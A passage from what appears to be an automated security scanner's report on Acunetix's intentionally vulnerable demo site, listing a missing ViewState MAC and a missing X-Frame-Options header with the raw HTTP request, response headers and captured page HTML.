3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkfCyPhouoc9T07CkSiDvxgplY0cc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKx7LcVArvjq48MAu2JnvwLAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w8CjfeklgcCjfeklgcCjffYKgKN99gqAo33jJINAo33jJINAo33oKkGAo33oKkGAuads94JAuads94JAuadp/UCAuadp/UCAuad24kKAuad24kKAuadz6wDAuadz6wDAuad48MMAuad48MMAuadl+YFAuadl+YFAuadi70NAuadi70NAuadv9AGAuadv9AGAuadk7kDAuadk7kDAuadh9wMAuadh9wMAvukkcUPAvukkcUPAvukhZgHAvukhZgHAvukuT8C+6S5PwL7pK3SCQL7pK3SCQL7pMH2AgL7pMH2AgL7pPWNCgL7pPWNCgL7pOmgAwL7pOmgAwL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DyY4AmtQ6l9yclXqngVcemir9JWK" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Solution Ensure the MAC is set for all pages on this website.
-
-
-
Risk=中等的, Confidence=中等的 (26)
-
http://testaspnet.vulnweb.com (26)
-
X-Frame-Options Header Not Set (26)
GET http://testaspnet.vulnweb.com
Alert tags Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request Request line and header section (211 bytes)
GET http://testaspnet.vulnweb.com HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cacheRequest body (0 bytes)
Response Status line and header section (296 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232; path=/; HttpOnly X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:16 GMT Content-Length: 13912Response body (13912 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> 